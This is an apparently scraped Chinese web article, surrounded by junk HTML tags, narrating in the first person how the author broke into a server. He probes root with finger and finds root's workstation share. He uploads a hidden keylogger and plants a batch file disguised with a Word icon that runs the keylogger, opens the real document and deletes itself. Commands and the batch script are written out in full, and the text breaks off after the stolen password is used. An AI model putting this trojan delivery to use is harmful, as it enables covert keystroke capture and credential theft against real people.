• <tr id='lzwig'><strong id='lzwig'></strong><small id='lzwig'></small><button id='lzwig'></button><li id='lzwig'><noscript id='lzwig'><big id='lzwig'></big><dt id='lzwig'></dt></noscript></li></tr><ol id='lzwig'><table id='lzwig'><blockquote id='lzwig'><tbody id='lzwig'></tbody></blockquote></table></ol><u id='lzwig'></u><kbd id='lzwig'><kbd id='lzwig'></kbd></kbd>
    1. <i id='lzwig'></i>
      <acronym id='lzwig'><em id='lzwig'></em><td id='lzwig'><div id='lzwig'></div></td></acronym><address id='lzwig'><big id='lzwig'><big id='lzwig'></big><legend id='lzwig'></legend></big></address>

      <code id='lzwig'><strong id='lzwig'></strong></code>
      <dl id='lzwig'></dl>
    2. <span id='lzwig'></span><fieldset id='lzwig'></fieldset>

          1. <ins id='lzwig'></ins><i id='lzwig'><div id='lzwig'><ins id='lzwig'></ins></div></i>

            看黑客如何入侵Linux操作系统

            • 时间:
            • 浏览:7
            • 来源:124软件资讯网

              我发现了一个网站 ,于是通例入侵  。

              很好 ,它的FINGER开着  ,于是我编了一个SHELL  ,aaa帐号试到zzz(by the way  ,这是我发现的一个网上纪律  ,那就是帐号的长度与口令的强度成正比  , 若是一个帐号只有两三位长  ,那它的口令一样平常也很简朴  ,反之亦然  ,故且称之为若氏定理吧)  ,效果一个帐号也不存在  ,我没有再试它的帐号  。由于我被它开的端口吸引住了  ,它开着WWW  ,我就不信它不堕落  。一连拿了五种CGI和WWW扫描器总计扫了三四百种常见错误它险些都不存在  。:( 有几个错误  ,但我不知道怎样使用  ,算了  。又绕着主机转了几圈  ,象狐狸遇见刺猬  ,无从下嘴  。

                照旧看看root的信息吧:

                finger root@xxx.xxx.xxx
                Login name: root In real life: system PRIVILEGED account
                Directory: / Shell: /bin/sh
                Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
                No Plan.

                root经常来  ,谁人202.xx.xx.xx就是他用的事情站了  ,从那会不会看到点工具呢 ?

                net view \202.xx.xx.xx
                Shared resources at \202.xx.xx.xx

                Sharename Type Comment
                x
                x
                我的公牍包
                The command was completed successfully.

                在上网的机械上开着WINDOWS的“文件和打印机共享”的服务  ,是许多人容易掉以轻心的  ,这个root没有破例  。若是它的C盘共享了而且可写那就好了 ,但那是做梦 ,现在开了共享的目录没有一个是根目录  ,连D驱的都没有  。别着急  ,逐步来  。x掉的那些文件夹都没用 ,不能写 ,内里尽是些英文原着 ,这个root还挺行的  。“我的公牍包”吸引了我的注重  ,这是一个用于将差别的机械上的资料举行同步的工具  ,很显然这个root要经常更新主机上的主页  ,有时间在自己的机械上编  ,有时间在主机上编……以是很主要的一点:“我的公牍包”的共享一样平常都是可写的  !

                那我再进去看看  。

                >net use i: \202.xx.xx.xx
                >i:
                >echo asdf>temp.txt

                不错  ,确实可写  。

                >del temp.txt

                不留痕迹——黑客的习惯  。

                >dir/od/p

              看看都有些什么…… 倒数第二排谁人是什么 ?“X月事情企图.doc”  !就是它了  ,既然是企图就不行能写完了就丢一边  ,它一定会再次打开它的——至少下个月写企图时要COPY一下:->


              该下手了  ,我的目的就是让它下次打开时误中我的陷阱而运行我藏的木马 。我这次用的是一个键盘计录软件HOOKDUMP  ,我以为它挺好的  ,价钱实惠  ,量也足…… 对不起 ,说习惯了  ,应该是它不仅记载下所有击键  ,还记载下打开或关掉了什么法式、按过什么按纽、用过什么菜单…… 总之  ,它的记载让你就和你站在他死后看他操作盘算机一样详细了  。您要问那么多木马你为啥装这个  ?要知道无论是中国的冰河、netspy照旧外国的netbus、BO  ,都被种种杀毒软件列为头号侦核对象 ,而一个root的机械上可不行能没装杀毒软件  ?照旧HOOKDUMP好  ,小小的 ,不起眼  ,不外若是各人都用只怕我再用它的时机就少了……

                >copy hookdump.* i:

                增补一点:上传前先编好它的hookdump.ini文件  ,置为隐藏方式运行 ,否则root一运行屏幕上蹦出一大窗口可就……  。

                然后再在自己的机械上编一个同名的BAT文件:X月事情企图.BAT

                >edit c:X月事情企图.BAT
                @echo off
                hookdump
                attrib -h X月事情企图.doc
                C:Program FilesMicrosoftOfficeWinword X月事情企图.doc
                attrib -h temp.bat
                del temp.pif
                del temp.bat

                看明确了吧  ?root运行了这个BAT文件现实上就是先运行木马  ,再挪用WINWORD文件打开它想开的这个文件 ,然后自我删除  ,也许它机械上WINWORD的位置差别 ,那挪用就会失败 ,不外没关系  ,横竖BAT会马上删除  ,他会以为是自己的误操作  。

                这时你的C驱根目录就有了这么一个BAT文件 ,它是一个方形的图标  ,和谁人WORD文件截然不同  ,root怎么会运行它呢 ?没关系 ,在这个文件上点右键 ,点属性  ,在“法式”栏选“更改图标”不就行了吗 ?WORD的图标在你机械C:Program FilesMicrosoftOffice中 。还要将“运行”改为“最小化” ,“退出时关闭”打上勾  ,这样才气保证在运行时一点迹象也没有  。事实上这个BAT文件酿成了两个  ,另有一个PIF文件就是它的图标  。

                把这两个文件传上去:

                >copy X月事情企图.bat i:
                >copy X月事情企图.pif i:

                然后把它的文件和自己的文件都藏起来:

                >attrib +h X月事情企图.doc
                >attrib +h X月事情企图.bat

                这样  ,root的“公牍包”里只剩下一个和原来一模一样的WORD图标  ,他做梦也没想到这已酿成了一个BAT文件  。然后可以喘口吻了  ,让我们悄悄的等……

                几天后  ,我进入这个事情站  ,取下记载下来的击键记载  ,找出root的口令 ,进入主机